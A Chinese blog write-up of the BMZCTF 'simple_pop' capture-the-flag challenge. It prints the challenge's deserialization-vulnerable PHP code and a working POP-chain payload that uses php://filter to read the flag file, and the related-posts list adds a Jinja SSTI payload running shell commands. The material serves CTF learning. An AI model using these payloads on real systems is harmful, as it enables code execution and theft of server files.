BMZCTF simple_pop

最新推荐文章于 2024-04-24 23:09:34 发布
最新推荐文章于 2024-04-24 23:09:34 发布
阅读量404 收藏
点赞数
分类专栏: BMZCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26243045/article/details/110264439
版权

考点:反序列化

打开题目发现如下代码

PHP伪协议的考点,需要先去读取useless.php

得到源码

<?php  
class Modifier {
    protected  $var;
    public function append($value){
        include($value);//flag.php
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['password'])){
    @unserialize($_GET['password']);
}
else{
    $a=new Show;
}
?>

这个POP链是通过Show类的__toString去触发Test类的__get最后调用Modifier的__invoke去得到flag。

下面开始构造payload

<?php
class Modifier{
	protected  $var='php://filter/convert.base64-encode/resource=/flag';
}
class Show{
	public $source;
    public $str;
}
class Test{
	public $p;
}
$m=new Modifier();
$s=new Show();
$t=new Test();

$t->p=$m;
$s->str=$t;
$s->source=$s;
echo urlencode(serialize($s));

?>

由于__toString函数也需要触发,所以这里我把Show类又赋值给了Show对象的source变量。

访问得到base64编码的内容。

解码获得flag

白帽子社区
关注
专栏目录
攻防世界-杂项-simple_transfer
weixin_47717433的博客
01-07 3400
攻防世界-杂项-simple_transfer 攻防世界杂项高手进阶区:simple_transfer。此题工具包括:wireshark,binwalk(linux操作系统) 题目 这道题是一个流量分析的题 1.wiresahrk打开附件,此处附上wiresahrk流量分析使用方法wireshark过滤。打开文件如下图所示 打开以后有点乱,于是进行协议分级。(协议分级的作用是统计通信流量中不同协议占比的百分比,看谁占比更多) 协议分级以后发现NFS协议占比94.3%,于是对NFS协议过滤。(NFS是Netw
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1930
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
simplepop:一个极小的用来替代浏览器原生弹出框的jquery插件
07-06
##SimplePop ###简介 一个用来替换浏览器原生弹出框的jquery插件,非常小巧,可定制度高,查看. ###使用方法 引入 <link rel="stylesheet" href="simplepop.css"> [removed][removed] [removed][removed] 使用 SimplePop.alert("hello world!"); 文档 更多详细参数请移步这里 ###License MIT
BMZCTFsimple_pop
末初的CSDN博客
04-17 439
http://bmzclub.cn/challenges#simple_pop <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")){ echo "<br><h1>".file_get
[BMZCTF]-simple_pop
cjdgg的博客
05-27 239
[BMZCTF]-simple_pop 题目直接给出了源代码,也比较简单粗暴,绕过两个过滤即可,先看第一个 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")) 这里我还是第一次见到file_get_contents($text,‘r’)这种用法,也想不出什么绕过方法,就去网上翻一下绕过方法,发现一个利用协议绕过的 确实可以,那这里算是过了,这里过了,接着就到 if(preg_match
jQuery对话框插件SimplePop.zip
07-04
JQuery对话框插件SimplePop是一款简单实用的网页jQuery对话框插件SimplePop
ctf-pop
qq_32445755的博客
05-15 1977
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
保密码查看器 [ANT]_Simple_v1.8.4
08-11
用于开锁,NOKIA手机的保密码查看! 就是那个手机的该死的密码……设定了以后,过了几个月,换手机了,就忘了...怎么也想不起来…… 于是,我去网上找啊找!终于发现了!绝对可以用! ...手机连接电脑,不要把手机锁了。...
Python实现PID控制基于simple_pid库
热门推荐
qq_51005828的博客
11-04 1万+
本篇文章并不涉及PID控制的原理,只包含如何使用simple_pid库实现由PID控制的系统。(案例的完整代码在文末) 这是simpel_pid库的官方介绍: A simple and easy to use PID controller in Python. If you want a PID controller without external dependencies that just works, this is for you! The PID was designed to be robus
另一种简单的读写-simple_read_from_buffer
weixin_39821531的博客
03-14 3640
之前在《简单的读和写》中提到过file_operations结构中的读/写方法中的buff参数是指向用户空间的缓冲区。而用户空间的指针,内核代码不能直接引用其中的内容。 所以用了copy_to_user和copy_from_user来完成最后的读写操作。 这里介绍另一对可以完成读写的函数:simple_read_from_buffer和simple_write_to_buffer。 这两个方...
CTF里WEB题中的POP
dangejinghong的博客
09-03 486
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2079
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
BMZCTF Ook
qq_26243045的博客
12-03 445
下载附件,是一个文件文件,打开后都是OoK的编码, 打开https://www.splitbrain.org/services/ook,输入密文,选择Ook to text 就可以得到flag
PHP反序列化--简单ctf题--pop链(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4588
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
通过[NewStarCTF 2023 公开赛道]POP Gadget,精析PHP反序列化POP链的构造(新手可学习)
最新发布
2301_79575827的博客
04-24 1141
php反序列化POP链详细构造
记一道ctf的反序列化POP链构造
weixin_43263451的博客
10-16 2045
<?php class Tiger{ public $string; protected $var; public function __toString(){ return $this->string; } public function boss($value){ @eval($value); } public function __invoke(){ $this->boss(...
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2627
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
[SWPUCTF 2021 新生赛]pop
qq_62046696的博客
05-20 1734
本来该期末考试了放弃看pop链表了,可是突然看着看着就通透了,那就赶紧记录下来,万一忘记了呢。 <?php error_reporting(0); show_source("index.php"); class w44m{ private $admin = 'aaa'; protected $passwd = '123456'; public function Getflag(){ if($this->admin === 'w44m' &amp
Simple_FOC
03-15
Simple_FOC是一个开源的电机控制库,用于实现电机的闭环控制。它基于Arduino平台,并使用了FOC(Field-Oriented Control)算法来实现高性能的电机控制。 Simple_FOC提供了一系列函数和类,可以方便地配置和控制电机。它支持不同类型的电机,包括无刷直流电机(BLDC)和直流有刷电机(DC)。通过使用FOC算法,Simple_FOC可以实现高效的电机控制,提供更好的转矩和速度响应。 Simple_FOC的主要特点包括: 1. 支持多种电机类型:BLDC、DC等。 2. 使用FOC算法实现高性能的电机控制。 3. 简单易用的API和配置接口。 4. 支持传感器和传感器无关的控制。 5. 开源项目,可以根据需要进行修改和定制。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子社区

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值